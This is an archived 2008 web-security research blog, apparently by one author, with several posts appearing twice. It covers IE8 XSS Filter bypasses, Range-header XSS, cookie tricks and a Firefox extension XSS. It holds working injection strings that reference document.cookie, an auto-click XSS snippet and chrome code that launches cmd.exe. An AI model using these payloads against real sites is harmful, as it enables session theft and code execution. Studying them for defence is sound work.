While participating in the CSAW CTF on the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points; RPISEC who placed second had 13575 points, go us ;), I had an interesting thought; one of our attacks was a persistent xss attack that loaded it's payload from off-site so that we could gain some level of persistent control, however I realised that this attack would fail completely in the face of NoScript even if our xss succeeded since the person would not have our malicious domain whitelisted.
So, in light of that, I was thinking of how we could load our payload from off-site, without the remote site running JavaScript. Of course, I am assuming you have already bypassed NoScript's XSS Filters (e.g. because the attack was persistent), but this information is particularly useful for persistent attacks when you may want to change the payload.
After thinking about this for a while, I realised that we've already solved the problem a while ago when we were talking about using TinyURL for data storage way back in 2006: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.
Of course TinyURL would be of no use to us here as we are interested in being able to change our payload, however all it would require to be useful is (possibly some kind of synchronisation so that we execute in the order we want, rather than the order we get data back from our evil web server and) changing the URL to point to a domain you control.
Nothing really ground-breaking, but something interesting nonetheless.
Wednesday, September 24, 2008
Thursday, September 04, 2008
IE8 XSS Filter
IE8 came out recently and a bunch of people have already commented about the limitations of the XSS Filter.
But there are a few more issues that need to be looked at. First of all, if anyone hasn't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.
After talking Cesar Cerrudo, it became clear that we both came to the conclusion that the easiest way to have a generic bypass technique for the filter would be to attack the same-site check, and we both came to the conclusion that, if we can somehow force the user to navigate from a page on the site we want to attack to our xss, then we've bypassed the filter.
If the site is a forum, or a blog, then this becomes trivial as we're allowed to post links, however even if we cannot normally post links this is still trivial as we can inject links in our XSS as the XSS Filter doesn't stop HTML Injection, in any case read this for more details.
However, this is not the only way to force a client-side navigation. One particular issue (which is normally not considered much of a vulnerability, unless it allows xss vulns) is when an application lets users control the contents of a frame, this is often seen in the help sections of web apps. However navigation caused by an iframe seems to be considered somehow user-initiated (or something) and the same-site check is applied so that if we point a frame on a site to an xss exploit, the xss exploit will trigger.
Initially I had thought this would extend to JavaScript based redirects of the form:
or in the form of frame-breaking code, however this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated or not and if it decides it is not user-initiated then it does not apply the same-site check and simply initiates the XSS Filter, though as with the popup blocker before it has some difficulty being correct 100% of the time, e.g. this counts as a user-initiated navigation:
However this is probably a very unrealistic issue as we need to vulnerable site to actually let the attacker create such a construct.
Furthermore HTTP Location redirects and Meta Refreshes are also not considered user navigation so filtering is always applied to those, therefore Open Redirects are pretty irrelevant to the XSS Filter.
However, Flash-based redirects do not seem to be considered redirects (which is unsurprising given that IE has no visibility into Flash files) and so any Flash-based redirects can be taken advantage of to bypass the xss filter, though if they require a user to click then it is probably simply easier to just inject a link (as described in Cesar's post)
And that's about all I could think of wrt that check :S
However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.
In a completely different direction, When I first read the posts that said the XSS filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", as I had assumed they would attempt to prevent an attacker breaking out of the string, however the filter has signatures to stop the actual payload. Essentially the filter attempts to stop you from calling a JavaScript function and assigning data to sensitive attributes, so all of the following injections are filtered:
among a variety of other sensitive attributes, however this does still leave us with some limited scope for an attack that may be possible in reasonably complicated JavaScript.
We are still left with the ability to:
- Reference sensitive variables, which is esnecially useful when injecting into redirects, e.g.
- Conducting variable assignments to sensitive data, e.g.
or
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can strip other pieces of data (which look like xss attacks) such as frame-breaking code, redirects, etc, but note we can't strip single lines of JS as the JS block needs to be syntactically valid for it to start getting executed, so anything potentially active which acts as a security measure beyond the extent of it's own tag can be stripped.
It's also worth noting that XSS Filter doesn't strip all styles, it only strips those that would allow more styles to slip past it and styles which can execute active code (which is pretty much just expression() )
And that's all for me at the moment; if anyone's looking for an interesting area for research, see if the IE8 XSS Filter always plays nice with server-side XSS Filters, who knows, maybe being able to break the context by getting the filter to strip stuff you can get your own html to be rendered in a different context that the server-side filter didn't expect.
P.S. Take this all with a grain of salt, this has been derived through black-box testing, and as such any of the conclusions above are really just educated guesses.
P.P.S Good on David Ross and Microsoft for making a positive move forward that's going to be opt-out. Obviously everyone is going to keep attacking it and finding weaknesses, but even if this only stops the scenario where the injection is right in the body of the page, then it's a huge step forward for webappsec; if this effectively blocks injections into JavaScript strings then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection
P.P.P.S. Don't forget this is based on security zones, so it can be disabled and is by default opt-in for the intranet zone, so all those local zone xss's for web servers on localhost or xss's for intranet apps are going to be largely unaffected
But there are a few more issues that need to be looked at. First of all, if anyone hasn't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.
After talking Cesar Cerrudo, it became clear that we both came to the conclusion that the easiest way to have a generic bypass technique for the filter would be to attack the same-site check, and we both came to the conclusion that, if we can somehow force the user to navigate from a page on the site we want to attack to our xss, then we've bypassed the filter.
If the site is a forum, or a blog, then this becomes trivial as we're allowed to post links, however even if we cannot normally post links this is still trivial as we can inject links in our XSS as the XSS Filter doesn't stop HTML Injection, in any case read this for more details.
However, this is not the only way to force a client-side navigation. One particular issue (which is normally not considered much of a vulnerability, unless it allows xss vulns) is when an application lets users control the contents of a frame, this is often seen in the help sections of web apps. However navigation caused by an iframe seems to be considered somehow user-initiated (or something) and the same-site check is applied so that if we point a frame on a site to an xss exploit, the xss exploit will trigger.
Initially I had thought this would extend to JavaScript based redirects of the form:
document.location = "http://www.site.com/user_input";
or in the form of frame-breaking code, however this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated or not and if it decides it is not user-initiated then it does not apply the same-site check and simply initiates the XSS Filter, though as with the popup blocker before it has some difficulty being correct 100% of the time, e.g. this counts as a user-initiated navigation:
<a name="x" id="x" href="http://localhost/xss.php?xss=<script>alert(7)</script>">test</a>
<script>
document.links[0].click();
</script>
However this is probably a very unrealistic issue as we need to vulnerable site to actually let the attacker create such a construct.
Furthermore HTTP Location redirects and Meta Refreshes are also not considered user navigation so filtering is always applied to those, therefore Open Redirects are pretty irrelevant to the XSS Filter.
However, Flash-based redirects do not seem to be considered redirects (which is unsurprising given that IE has no visibility into Flash files) and so any Flash-based redirects can be taken advantage of to bypass the xss filter, though if they require a user to click then it is probably simply easier to just inject a link (as described in Cesar's post)
And that's about all I could think of wrt that check :S
However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.
In a completely different direction, When I first read the posts that said the XSS filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", as I had assumed they would attempt to prevent an attacker breaking out of the string, however the filter has signatures to stop the actual payload. Essentially the filter attempts to stop you from calling a JavaScript function and assigning data to sensitive attributes, so all of the following injections are filtered:
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//
among a variety of other sensitive attributes, however this does still leave us with some limited scope for an attack that may be possible in reasonably complicated JavaScript.
We are still left with the ability to:
- Reference sensitive variables, which is esnecially useful when injecting into redirects, e.g.
"+document.cookie+"
- Conducting variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
";escape=eval;//
Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can strip other pieces of data (which look like xss attacks) such as frame-breaking code, redirects, etc, but note we can't strip single lines of JS as the JS block needs to be syntactically valid for it to start getting executed, so anything potentially active which acts as a security measure beyond the extent of it's own tag can be stripped.
It's also worth noting that XSS Filter doesn't strip all styles, it only strips those that would allow more styles to slip past it and styles which can execute active code (which is pretty much just expression() )
And that's all for me at the moment; if anyone's looking for an interesting area for research, see if the IE8 XSS Filter always plays nice with server-side XSS Filters, who knows, maybe being able to break the context by getting the filter to strip stuff you can get your own html to be rendered in a different context that the server-side filter didn't expect.
P.S. Take this all with a grain of salt, this has been derived through black-box testing, and as such any of the conclusions above are really just educated guesses.
P.P.S Good on David Ross and Microsoft for making a positive move forward that's going to be opt-out. Obviously everyone is going to keep attacking it and finding weaknesses, but even if this only stops the scenario where the injection is right in the body of the page, then it's a huge step forward for webappsec; if this effectively blocks injections into JavaScript strings then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection
P.P.P.S. Don't forget this is based on security zones, so it can be disabled and is by default opt-in for the intranet zone, so all those local zone xss's for web servers on localhost or xss's for intranet apps are going to be largely unaffected
Labels:
IE,
Security (All),
Web App Sec,
XSS
Wednesday, August 06, 2008
Thoughts on the DNS patch/bug
Is it just me, or does the DNS patch only seem to buy us more time?
At most this decreases the chance of a succesful attack 65k times, at worst it doesn't help because of NAT, and if you're running a default MS <= win2k3 OS then it's 2.5k times.
Honestly, I haven't had time to play around with any of the exploits floating around, but given 1 attempt = at most 2 packets (though it's probably much closer to 1, since you can try lots of responses per packet), we can send 32k packetrs pretty quickly, and the figures here also seem to say it works pretty damn quickly.
I'm not going to do any figures, but given how network speeds seem to go constantly upwards (or do we want to speculate about an upper cap?), we're going to reach a problem at some stage where senging 65k times the amount of data is going to be bloody fast again, and this will be an issue all over again.
And if that ever happens; what's left to randomize in the query? nothing as far as I can tell, so is the hope that by then we'll have all switched to DNSSEC, or are we planning on altering the DNS protocol at that point?
Anyway, going in a completely different direction, I want to take issue with the idea that seems to be pervading a lot of descriptions of the DNS bug that poisoning random subdomains isn't an issue.
For your typical attack, yes, poisoning random subdomains is kind of useless, however a lot of the web is held together by the idea that absolutely everything in a DNS tree of a domain is controlled by that domain and is to some extent trustworthy (think cookies and document.domain in JavaScript).
Also, it seems odd that given that the fact that you could poison random domains seems common knowledge to some people Dan is nominated for another pwnie award for XSS-ing arbitrary nonexistant subdomains. Sure, that bug gives you the ability to phish people more easil, but to me the biggest part of that seemed to be the fact that you could easily attack the parent domains form there.
Anyway, the patch, while having it's limitations, seems to buy us some time with both these bugs, and in fact should buy us time with any bugs where responses are forged, so that's always a good thing.
At most this decreases the chance of a succesful attack 65k times, at worst it doesn't help because of NAT, and if you're running a default MS <= win2k3 OS then it's 2.5k times.
Honestly, I haven't had time to play around with any of the exploits floating around, but given 1 attempt = at most 2 packets (though it's probably much closer to 1, since you can try lots of responses per packet), we can send 32k packetrs pretty quickly, and the figures here also seem to say it works pretty damn quickly.
I'm not going to do any figures, but given how network speeds seem to go constantly upwards (or do we want to speculate about an upper cap?), we're going to reach a problem at some stage where senging 65k times the amount of data is going to be bloody fast again, and this will be an issue all over again.
And if that ever happens; what's left to randomize in the query? nothing as far as I can tell, so is the hope that by then we'll have all switched to DNSSEC, or are we planning on altering the DNS protocol at that point?
Anyway, going in a completely different direction, I want to take issue with the idea that seems to be pervading a lot of descriptions of the DNS bug that poisoning random subdomains isn't an issue.
For your typical attack, yes, poisoning random subdomains is kind of useless, however a lot of the web is held together by the idea that absolutely everything in a DNS tree of a domain is controlled by that domain and is to some extent trustworthy (think cookies and document.domain in JavaScript).
Also, it seems odd that given that the fact that you could poison random domains seems common knowledge to some people Dan is nominated for another pwnie award for XSS-ing arbitrary nonexistant subdomains. Sure, that bug gives you the ability to phish people more easil, but to me the biggest part of that seemed to be the fact that you could easily attack the parent domains form there.
Anyway, the patch, while having it's limitations, seems to buy us some time with both these bugs, and in fact should buy us time with any bugs where responses are forged, so that's always a good thing.
Sunday, August 03, 2008
Is framework-level SQL query caching dangerous?
I was in a bookshop a few months ago and picked up a book about Ruby on Rails, and though I sadly didn't buy it (having already bought more books than I wanted to carry) and I've forgotten it's name, there was an interesting gem in there that stuck in my head.
Ruby on Rails' main method of performing SQL queries (ActiveRecord) since 2.0, by default, caches the results of SELECT queries (though it does string-level matching of queries, so they need to be completely identical, rather than functionaly identical) untill a relevant update query updates the table.
I haven't had a chance to delve into the source to see how granularly the cache is updated (i.e. if a row in the cache was not updated in an update, is the cache still invalidated sinc ethe table was updated?), but in any case, it still seems dangerous.
Caching data that close to the application means that unless you know about the caching and either disable it or ensure that anything else that possibly updates the data also uses the same cache, you may end up with an inconsistent cache.
Assuming that flushing the cache is fairly granular operation (or there is very little activity on the table or users are stored as separate tables, or something similar), it seems feasible that if there is any other technology interacting with the same database, it would be possible to ensure that dodgy data is cached in the Rails app.
A possible example would be a banking site where an SQL query like
Is executed when you view the account details or attempt to transfer money, then if there was another interface to withdraw money (lets say an ATM even; doesn't have to be web-based) that bypassed Rails' SQL cache it is theoretically possible that if we would be able to withdraw the money, but the Rails app would still think that we had money left.
At this point of course things would become very implementation specific, though there are two main ways I could see this going (maybe there are more):
1. We could be lucky and the application itself subtracts the amount we're trying to transfer and then puts that value directly into an SQL query, so it's as if we never withdrew any money.
2. We could be unlucky and an SQL query of this variety is used:
In which case the only thing we gain is the ability to overdraw from an account where we would not be able to usually; not particularly useful unless you've stolen someone else's account already and want to get the most about it, but it does still allow us to bypass a security check.
Does anyone have any thoughts on this? Is this too unlikely? Is no-one ever going to use Rails for anything sensitive? Should I go and read the source next time before posting crap? etc
Or knowledge of the Rails caching mechanism? I'll probably take a look soon, but given I've been meaning to do this for months...
Ruby on Rails' main method of performing SQL queries (ActiveRecord) since 2.0, by default, caches the results of SELECT queries (though it does string-level matching of queries, so they need to be completely identical, rather than functionaly identical) untill a relevant update query updates the table.
I haven't had a chance to delve into the source to see how granularly the cache is updated (i.e. if a row in the cache was not updated in an update, is the cache still invalidated sinc ethe table was updated?), but in any case, it still seems dangerous.
Caching data that close to the application means that unless you know about the caching and either disable it or ensure that anything else that possibly updates the data also uses the same cache, you may end up with an inconsistent cache.
Assuming that flushing the cache is fairly granular operation (or there is very little activity on the table or users are stored as separate tables, or something similar), it seems feasible that if there is any other technology interacting with the same database, it would be possible to ensure that dodgy data is cached in the Rails app.
A possible example would be a banking site where an SQL query like
SELECT * FROM accounts WHERE acct_id = ?
Is executed when you view the account details or attempt to transfer money, then if there was another interface to withdraw money (lets say an ATM even; doesn't have to be web-based) that bypassed Rails' SQL cache it is theoretically possible that if we would be able to withdraw the money, but the Rails app would still think that we had money left.
At this point of course things would become very implementation specific, though there are two main ways I could see this going (maybe there are more):
1. We could be lucky and the application itself subtracts the amount we're trying to transfer and then puts that value directly into an SQL query, so it's as if we never withdrew any money.
2. We could be unlucky and an SQL query of this variety is used:
UPDATE accounts SET balance = balance - ? WHERE acct_id = ?
In which case the only thing we gain is the ability to overdraw from an account where we would not be able to usually; not particularly useful unless you've stolen someone else's account already and want to get the most about it, but it does still allow us to bypass a security check.
Does anyone have any thoughts on this? Is this too unlikely? Is no-one ever going to use Rails for anything sensitive? Should I go and read the source next time before posting crap? etc
Or knowledge of the Rails caching mechanism? I'll probably take a look soon, but given I've been meaning to do this for months...
Sunday, July 27, 2008
XSS-ing Firefox Extensions
[EDIT]:It turns out I fail at testing things on the latest version, see comments for some more details, sorry about that Roee.[/EDIT]
Roee Hay recently posted a blog post on the Watchfire blog about an XSS bug in the Tamper Data extension (it was posted much earlier, but removed quickly; RSS is fun), however when he assessed the impact he was wrong.
The context of the window is still within the extension, and so by executing the following code you can launch an executable:
(Code stolen from http://developer.mozilla.org/en/docs/Code_snippets:Running_applications)
But even then; I had never even heard of the Graphing functionality in Tamper Data, and given the need to actually use the functionality on a dodgy page, the chance of anyone getting owned with this seems very small to me.
Roee Hay recently posted a blog post on the Watchfire blog about an XSS bug in the Tamper Data extension (it was posted much earlier, but removed quickly; RSS is fun), however when he assessed the impact he was wrong.
The context of the window is still within the extension, and so by executing the following code you can launch an executable:
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\WINDOWS\\system32\\cmd.exe");
file.launch();
(Code stolen from http://developer.mozilla.org/en/docs/Code_snippets:Running_applications)
But even then; I had never even heard of the Graphing functionality in Tamper Data, and given the need to actually use the functionality on a dodgy page, the chance of anyone getting owned with this seems very small to me.
Labels:
Firefox,
Security (All),
Web App Sec,
XSS
Monday, July 21, 2008
Licensing Content
Now, I am not a lawyer (so I don't know what information can be licensed and what can't), but as far as I know the fact that I have specified no license for the use of content on this blog does not mean it is public domain, or similar.
So, I just wanted to make a quick post about what license the content of this blog is provided under.
All the information on this blog is DUAL LICENSED,
1. If you plan to use it for personal or non-profit purposes you can use it under the Creative Commons "Attribution-Noncommercial-Share Alike 3.0" license.
2. In the case you plain to use it for _any_ other purpose, e.g.:
a. use the information in any commercial context
b. implement this information in your non-GPL application
c. use this information during a Penetration Test
d. make any profit from it
you need to contact me in order to obtain a commercial license.
Seems only fair to me :)
P.S. Since realistically the chance of me finding a violation is slim-to-none, and the chance of me actually doing anything about it (e.g. going to court, etc), is even smaller, this is more a statement of my will for the information than anything else.
So, I just wanted to make a quick post about what license the content of this blog is provided under.
All the information on this blog is DUAL LICENSED,
1. If you plan to use it for personal or non-profit purposes you can use it under the Creative Commons "Attribution-Noncommercial-Share Alike 3.0" license.
2. In the case you plain to use it for _any_ other purpose, e.g.:
a. use the information in any commercial context
b. implement this information in your non-GPL application
c. use this information during a Penetration Test
d. make any profit from it
you need to contact me in order to obtain a commercial license.
Seems only fair to me :)
P.S. Since realistically the chance of me finding a violation is slim-to-none, and the chance of me actually doing anything about it (e.g. going to court, etc), is even smaller, this is more a statement of my will for the information than anything else.
Saturday, July 12, 2008
Some Random Safari Notes
I got to take a quick look at some Safari stuff at work a few days ago, and came away with a few notes that I thought might interest people about Safari:
Cross-Site Cooking works the same way as it does in Firefox 2.0, namely it works just as the RFC describes and we can set cookies for .co.uk, .com.au, etc.
HttpOnly is not supported.
Safari parses Set-Cookie headers like the RFC says, which means that cookies are comma separated (no other browsers seem to do this), which means that in ASP.NET and JSP, when you use the framework's method of setting cookies and you let the user control the value, they can inject arbitrary cookies by specifying something like ", arbitrary_name=arbitrary_value" as the cookie value.
Referers are not leaked from https to http, but are leaked from one https site to another https site.
The safari cache (at lest on windows) is an SQLite database where all the data is double hex encoded; it looks something like X'aabbccddeeff, etc, and when you strip the first two chars and decode it you get another blob which looks identical to the first one, which you then need to decode the same way and you get an XML document with the data, I wrote this dodgy PHP function to do the conversion for me: (you need to call it twice on the blob you extract from the database)
On the iPhone (emulator at least; I didn't get to use an actual iPhone), the last character of the password field is shown before you type the next one in (and untill the field loses focus); this makes sense since it's hard to type on iPhones, but it's still curious.
Safari on the iPhone (emulator, again) doesn't seem to actually close, so unless you close the emulator (I'm assuming this is equivalent to turning off your iPhone; if that's even possible), all session cookies persist.
Hope that helps someone.
Cross-Site Cooking works the same way as it does in Firefox 2.0, namely it works just as the RFC describes and we can set cookies for .co.uk, .com.au, etc.
HttpOnly is not supported.
Safari parses Set-Cookie headers like the RFC says, which means that cookies are comma separated (no other browsers seem to do this), which means that in ASP.NET and JSP, when you use the framework's method of setting cookies and you let the user control the value, they can inject arbitrary cookies by specifying something like ", arbitrary_name=arbitrary_value" as the cookie value.
Referers are not leaked from https to http, but are leaked from one https site to another https site.
The safari cache (at lest on windows) is an SQLite database where all the data is double hex encoded; it looks something like X'aabbccddeeff, etc, and when you strip the first two chars and decode it you get another blob which looks identical to the first one, which you then need to decode the same way and you get an XML document with the data, I wrote this dodgy PHP function to do the conversion for me: (you need to call it twice on the blob you extract from the database)
function decode_blob ($blob) {
$ret = "";
for ($i=2,$c=strlen($blob);$i<$c;$i+=2) {
$ret .= chr(hexdec ($blob[$i].$blob[$i+1]));
}
return $ret;
}
On the iPhone (emulator at least; I didn't get to use an actual iPhone), the last character of the password field is shown before you type the next one in (and untill the field loses focus); this makes sense since it's hard to type on iPhones, but it's still curious.
Safari on the iPhone (emulator, again) doesn't seem to actually close, so unless you close the emulator (I'm assuming this is equivalent to turning off your iPhone; if that's even possible), all session cookies persist.
Hope that helps someone.
Friday, July 04, 2008
Cookie Path Traversal
Not sure if anyone actually cares about this, but thought I might just throw it out here: I found out a while ago that if a server is running IIS (or something else which accepts windows-style paths), then it is possible to get cookies sent to paths that they do not belong to by using an encoded backslash to indicate a directory delimiter like this: http://www.microsoft.com/en/us/test/..%5Cdefault.aspx
It works on all the browsers I tested (latest versions of IE, Firefox, Opera & Safari).
Not really useful, maybe on the off chance that, say, you need httpOnly cookies for some reason, and you can see headers for part of a path (e.g. because there's a phpinfo page in the root, but the cookie is for /app), or whatever, supposedly this was considered a security issue by Secunia way back when you could use %2e%2e/ on all servers in all browsers: http://secunia.com/advisories/9680/ (Though I think the premise for that bug is that you can't jump pages, which is of course wrong)
It works on all the browsers I tested (latest versions of IE, Firefox, Opera & Safari).
Not really useful, maybe on the off chance that, say, you need httpOnly cookies for some reason, and you can see headers for part of a path (e.g. because there's a phpinfo page in the root, but the cookie is for /app), or whatever, supposedly this was considered a security issue by Secunia way back when you could use %2e%2e/ on all servers in all browsers: http://secunia.com/advisories/9680/ (Though I think the premise for that bug is that you can't jump pages, which is of course wrong)
Sunday, June 08, 2008
Web Browsers and Other Mistakes
If anyone's interested, I uploaded my Bluehat slides here: http://www.slideshare.net/kuza55/web-browsers-and-other-mistakes-presentation/ (view online) and here: http://www.slideshare.net/kuza55/web-browsers-and-other-mistakes-presentation/download (download ppt)
Hopefully you get something out of them.
Hopefully you get something out of them.
Saturday, April 12, 2008
How much do you trust your DNS operator?
TechCrunch recently broke a story about Network Solutions hijacking users' unused subdomains for advertising. It seems to have only applied to people using Network Solutions for their shared hosting, and seems to have been removed now. (None of the IPs I tested on the same machine returned advertising for their non-existent subdomains) And on top of that we know that anyone who is on shared hosting is pretty easy pickings anyway, so this would seem to be a non-issue regarding security.
But Network Solutions doesn't exactly have the cleanest record in terms of ethics and there isn't anything technically stopping Network Solutions or any other company operating NS servers for your domain doing the same thing even if they're not hosting your content.
So given that this is a security blog, and definitely not an ethics blog, why am I talking about this? Because it introduces security problems.
As I talked about in previous posts about cookies, they are almost always sent to subdomains, and if your DNS operator implements something like this then all your users' cookies are being sent to your DNS operator's servers, which means that your cookies are taking two specific network paths which both have to be secure for your credentials to remain safe (three if you count that the DNS request has to be safe).
Now you may trust that your DNS provider isn't going to do anything intentionally malicious with the cookies, and are probably making the valid point that worrying about people having owned other networks being a vague and impractical threat to defend most websites against, but there is a much simpler risk involved here.
Network Solutions has made no effort to secure these pages from XSS, and why would you? They're essentially brochureware domains. Anyone who has probed a parked domain for XSS has probably seen that they have plenty of XSS holes, and the pages Network Solutions served for non-existent were the same pages that they serve on parked domains.
So after googling to find a parked Network Solutions domain, I found it was unsurprisingly trivial to XSS it via the search field.
So; how much do you trust your DNS operator?
But Network Solutions doesn't exactly have the cleanest record in terms of ethics and there isn't anything technically stopping Network Solutions or any other company operating NS servers for your domain doing the same thing even if they're not hosting your content.
So given that this is a security blog, and definitely not an ethics blog, why am I talking about this? Because it introduces security problems.
As I talked about in previous posts about cookies, they are almost always sent to subdomains, and if your DNS operator implements something like this then all your users' cookies are being sent to your DNS operator's servers, which means that your cookies are taking two specific network paths which both have to be secure for your credentials to remain safe (three if you count that the DNS request has to be safe).
Now you may trust that your DNS provider isn't going to do anything intentionally malicious with the cookies, and are probably making the valid point that worrying about people having owned other networks being a vague and impractical threat to defend most websites against, but there is a much simpler risk involved here.
Network Solutions has made no effort to secure these pages from XSS, and why would you? They're essentially brochureware domains. Anyone who has probed a parked domain for XSS has probably seen that they have plenty of XSS holes, and the pages Network Solutions served for non-existent were the same pages that they serve on parked domains.
So after googling to find a parked Network Solutions domain, I found it was unsurprisingly trivial to XSS it via the search field.
So; how much do you trust your DNS operator?
Labels:
DNS,
Security (All),
Web App Sec,
XSS
Saturday, February 23, 2008
HTTP Range & Request-Range Request Headers
For those that haven't heard of the Range header, here's a link: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.2
For everyone who can't be bothered reading a link; essentially the Range header is what you use to ask a server for a part of a response, rather than the whole response; it's what makes resumeable downloads possible over http.
Anyway, another piece of research I presented at 24c3 is pretty simply, but rather useful:
If Flash were to allow us to send a Range header, then we would be able to get things sent to us completely out of context.
Until Apache 2.0 this header was only used when requesting static files, so it would not influence a typical XSS, however if we have an application such as vBulletin which protects against FindMimeFromData XSS attacks by searching the first 256 bytes for certain strings, then we can simply place our strings after the first 256 bytes and get Flash to send a header which looks like this:
To have unscanned data sent in the first 256 bytes, leading to XSS.
However since Apache 2.0 (and possibly in other webservers, but they're irrelevant to this post), the Range handling code is implemented as a filter; this means that it is applied to the output of every request, even if they are dynamic requests.
This means that if we were to have a normally unexploitable XSS condition where our use input was printed to the page inside an attribute with quotes either encoded or stripped, but all other metacharacters left intact, or an xss filter did not encode the html attributes you had at all like so:
Then we could use the Range header to request only our unencoded portion which would result in XSS.
Now, why is this important since Flash has never let anyone send a Range header?
Well, while looking through the Apache source code I found this beautiful snippet:
Which essentially says that if you can't find a Range header, look for a Request-Range header, and untill the latest version of Flash (9,0,115,0), the Request-Range header was not blocked. (I had hoped this would be unpatched when I presented it, but you can't really hope for much when you sit on a bug for almost half a year...)
Now the part I didn't present. In Firefox 3 Firefox implemented the new Cross-Site XMLHttpRequest which, as the name suggests, lets you make cross-site requests and read the responses.
There is some documentation here: http://developer.mozilla.org/en/docs/Cross-Site_XMLHttpRequest
The part of those specs which is relevant to this post is that you can allow Cross-Site XMLHttpRequests by including an XML preprocessing instruction; however you can't just XSS it onto the page as usual because it needs to be before any other data.
However, the XMLHttpRequest object allows you to append both Range and Request-Range headers. And by appending a Range header we can get our XSS-ed instruction to the start of the response, and read the response.
The limitations with this are fairly strict; as far as I can tell, you cannot add to the XHR policy cache with xml instructions, only with headers, and if you attempt to request multiple ranges, then the multi-part boundary which begins the response will be sent before the xml instruction, and so it will not be parsed, so you can only get the contents of the page that are after your XSS point. On the other hand I wasn't even able to get non-GET requests to work with server-side co-operation, so take these with a handful of salt.
On the up side, this does bypass the .NET RequestValidation mechanism since that does not flag on <? However, I doubt this will be very exploitable in many scenarios, though given the amount of .NET apps which are only protected by the RequestValidation mechanism; you're sure to find something.
For everyone who can't be bothered reading a link; essentially the Range header is what you use to ask a server for a part of a response, rather than the whole response; it's what makes resumeable downloads possible over http.
Anyway, another piece of research I presented at 24c3 is pretty simply, but rather useful:
Flash
If Flash were to allow us to send a Range header, then we would be able to get things sent to us completely out of context.
Until Apache 2.0 this header was only used when requesting static files, so it would not influence a typical XSS, however if we have an application such as vBulletin which protects against FindMimeFromData XSS attacks by searching the first 256 bytes for certain strings, then we can simply place our strings after the first 256 bytes and get Flash to send a header which looks like this:
Range: bytes=257-2048
To have unscanned data sent in the first 256 bytes, leading to XSS.
However since Apache 2.0 (and possibly in other webservers, but they're irrelevant to this post), the Range handling code is implemented as a filter; this means that it is applied to the output of every request, even if they are dynamic requests.
This means that if we were to have a normally unexploitable XSS condition where our use input was printed to the page inside an attribute with quotes either encoded or stripped, but all other metacharacters left intact, or an xss filter did not encode the html attributes you had at all like so:
<a href=“http://site.com/<script>alert(1)</script>”>link</a>
Then we could use the Range header to request only our unencoded portion which would result in XSS.
Now, why is this important since Flash has never let anyone send a Range header?
Well, while looking through the Apache source code I found this beautiful snippet:
if (!(range = apr_table_get(r->headers_in, "Range"))) {
range = apr_table_get(r->headers_in, "Request-Range");
}
Which essentially says that if you can't find a Range header, look for a Request-Range header, and untill the latest version of Flash (9,0,115,0), the Request-Range header was not blocked. (I had hoped this would be unpatched when I presented it, but you can't really hope for much when you sit on a bug for almost half a year...)
Firefox
Now the part I didn't present. In Firefox 3 Firefox implemented the new Cross-Site XMLHttpRequest which, as the name suggests, lets you make cross-site requests and read the responses.
There is some documentation here: http://developer.mozilla.org/en/docs/Cross-Site_XMLHttpRequest
The part of those specs which is relevant to this post is that you can allow Cross-Site XMLHttpRequests by including an XML preprocessing instruction; however you can't just XSS it onto the page as usual because it needs to be before any other data.
However, the XMLHttpRequest object allows you to append both Range and Request-Range headers. And by appending a Range header we can get our XSS-ed instruction to the start of the response, and read the response.
The limitations with this are fairly strict; as far as I can tell, you cannot add to the XHR policy cache with xml instructions, only with headers, and if you attempt to request multiple ranges, then the multi-part boundary which begins the response will be sent before the xml instruction, and so it will not be parsed, so you can only get the contents of the page that are after your XSS point. On the other hand I wasn't even able to get non-GET requests to work with server-side co-operation, so take these with a handful of salt.
On the up side, this does bypass the .NET RequestValidation mechanism since that does not flag on <? However, I doubt this will be very exploitable in many scenarios, though given the amount of .NET apps which are only protected by the RequestValidation mechanism; you're sure to find something.
Friday, February 22, 2008
Racing to downgrade users to cookie-less authentication
Be warned: this post is a bit out there, and not extremely practical, but I'm posting exploit code and I thought the attack was fun.
If you ever disable cookies and try to use the web you will notice that a surprising number of websites that use sessions still work, especially if they are using a session management framework or were written during the browser wars when a significant number of people still didn't have cookie support in their browser, or were suspicious enough to have them disabled.
All of the cookie-less authentication systems rely on the same idea: passing session tokens through the URL. Other than being bad practice because it gets logged, etc, FUD, etc, they also get leaked through referers to 3rd parties. So if we can get an persistent image pointing to our server, then we will have the session tokens leaked to us. And it does have to be persistent, because unlike cookies, session tokens passed in the URL are not implicit and are not attached to our reflected html injections.
However this is usually never raised as an issue because everyone has cookies enabled these days, and this attack doesn't work against anyone.
However, how do web applications which need to work without JavaScript detect if a user's browsers supports cookies? They simply set a cookie, and then when the user logs in they verify whether a cookie was sent, and if it was not they then start putting the session id in all the links and forms on a page. Some applications also check on every subsequent page if they can set a cookie, and if they can there is no way to degrade to cookie-less auth again.
As I wrote previously; I discovered that in Firefox and Opera we can exhaust the cookie limit to delete the user's old cookies.
